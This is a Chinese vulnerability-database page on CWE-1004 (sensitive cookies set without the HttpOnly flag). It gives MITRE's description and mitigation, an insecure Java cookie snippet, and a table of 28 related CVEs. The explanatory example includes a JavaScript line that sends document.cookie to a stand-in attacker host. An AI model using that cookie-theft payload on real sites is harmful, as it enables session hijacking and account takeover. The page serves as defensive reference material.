目标达成 感谢每一位支持者 — 我们达成了 100% 目标!

目标: 1000 元 · 已筹: 1000

100.0%
请我们喝杯咖啡

CWE-1004 没有’HttpOnly’标志的敏感Cookie 类漏洞列表 28

CWE-1004 没有’HttpOnly’标志的敏感Cookie 类弱点 28 条 CVE 漏洞汇总,含 AI 中文分析。

CWE-1004 属于敏感信息泄露类漏洞,指应用程序在存储敏感数据的 Cookie 中未设置 HttpOnly 标志。攻击者常利用跨站脚本(XSS)漏洞窃取该 Cookie,从而获取会话令牌或敏感凭证,进而接管用户账户。开发者应在生成 Cookie 时显式启用 HttpOnly 属性,禁止客户端脚本访问,并结合 Secure 和 SameSite 属性,以有效防止敏感数据被恶意脚本读取或滥用。

MITRE CWE 官方描述
CWE:CWE-1004 未设置 'HttpOnly' 标志的敏感 Cookie 英文:产品使用 Cookie 来存储敏感信息,但该 Cookie 未标记 HttpOnly 标志。
常见影响 (2)
ConfidentialityRead Application Data
If the HttpOnly flag is not set, then sensitive information stored in the cookie may be exposed to unintended parties.
IntegrityGain Privileges or Assume Identity
If the cookie in question is an authentication cookie, then not setting the HttpOnly flag may allow an adversary to steal authentication data (e.g., a session ID) and assume the identity of the user.
缓解措施 (1)
ImplementationLeverage the HttpOnly flag when setting a sensitive cookie in a response.
Effectiveness: High
代码示例 (1)
In this example, a cookie is used to store a session ID for a client's interaction with a website. The intention is that the cookie will be sent to the website with each request made by the client.
String sessionID = generateSessionId(); Cookie c = new Cookie("session_id", sessionID); response.addCookie(c);
Bad · Java
document.write('<img src="http://attacker.example.com/collect-cookies?cookie=' + document.cookie . '">'
Attack · JavaScript
CVE ID标题CVSS风险等级Published
CVE-2026-42239 Budibase 会话Cookie未设HttpOnly导致XSS可接管账户 — budibase 8.1 High2026-05-07
CVE-2026-0696 ConnectWise PSA 安全漏洞 — PSA 6.5 Medium2026-01-16
CVE-2026-22081 Tenda N300 安全漏洞 — 300Mbps Wireless Router F3 and N300 Easy Setup Router 7.5 -2026-01-09
CVE-2025-12031 Azure Access Technology BLU-IC2和Azure Access Technology BLU-IC4 安全漏洞 — BLU-IC2 5.3AIMediumAI2025-10-21
CVE-2025-42909 SAP Cloud Appliance Library Appliances 安全漏洞 — SAP Cloud Appliance Library Appliances 3.0 Low2025-10-14
CVE-2025-27453 Endress+Hauser MEAC300-FNADE4 安全漏洞 — Endress+Hauser MEAC300-FNADE4 5.3 Medium2025-07-03
CVE-2025-49189 SICK Field Analytics和SICK Media Server 安全漏洞 — SICK Media Server 5.3 Medium2025-06-12
CVE-2025-47289 CE Phoenix 安全漏洞 — PhoenixCart 6.3 Medium2025-06-02
CVE-2025-24318 Dario Health USB-C Blood Glucose Monitoring System 安全漏洞 — Dario Application Database and Internet-based Server Infrastructure 6.8 Medium2025-02-28
CVE-2025-0479 CP Plus CP-XR-DE21-S 安全漏洞 — CP-XR-DE21-S Router 9.1 -2025-01-20
CVE-2022-43845 IBM Aspera Console 安全漏洞 — Aspera Console 3.7 Low2024-09-24
CVE-2022-33167 IBM Security Directory Integrator和IBM Security Verify Directory 安全漏洞 — Security Directory Integrator 3.7 Low2024-07-30
CVE-2024-41685 SyroTech SY-GPON-1110-WDONT 安全漏洞 — SyroTech SY-GPON-1110-WDONT router 5.3 -2024-07-26
CVE-2024-6739 Openfind MailGates和Openfind MailAudit 安全漏洞 — MailGates 5.3 Medium2024-07-15
CVE-2023-4217 MOXA PT-G503 安全漏洞 — PT-G503 Series 3.1 Low2023-11-02
CVE-2023-4228 MOXA ioLogik 4000 Series 安全漏洞 — ioLogik 4000 Series 3.1 Low2023-08-24
CVE-2023-2876 ABB REX640 安全漏洞 — REX640 PCL1 3.1 Low2023-06-13
CVE-2022-21939 Johnson Controls System Configuration Tool 跨站脚本漏洞 — System Configuration Tool (SCT) 7.5 High2023-02-09
CVE-2019-25091 nsupdate.info 安全漏洞 — nsupdate.info 3.7 Low2022-12-27
CVE-2022-4630 daloRADIUS 安全漏洞 — lirantal/daloradius 5.3 -2022-12-21
CVE-2022-25172 InHand Networks InRouter302 跨站脚本漏洞 — InRouter302 6.1 -2022-05-12
CVE-2021-42115 Business-Dna Solution GmbH TopEase 安全漏洞 — TopEase 8.1 High2021-11-30
CVE-2021-39210 GLPI 安全漏洞 — glpi 6.5 Medium2021-09-15
CVE-2021-3706 Pi-Hole Adminlte 安全漏洞 — pi-hole/adminlte 7.5 -2021-09-15
CVE-2021-34563 Pepperl Fuchs WirelessHART-Gateway安全漏洞 — WHA-GW-F2D2-0-AS- Z2-ETH 3.3 Low2021-08-31
CVE-2020-27658 Synology Router Manager 安全漏洞 — Synology Router Manager (SRM) 7.1 High2020-10-29
CVE-2020-6267 SAP Disclosure Management 跨站脚本漏洞 — SAP Disclosure Management 6.5 -2020-07-14
CVE-2019-8283 Gemalto Admin Control Center 信息泄露漏洞 — Sentinel LDK RTE 6.5 -2019-06-07

CWE-1004(没有’HttpOnly’标志的敏感Cookie) 是常见的弱点类别,本平台收录该类弱点关联的 28 条 CVE 漏洞。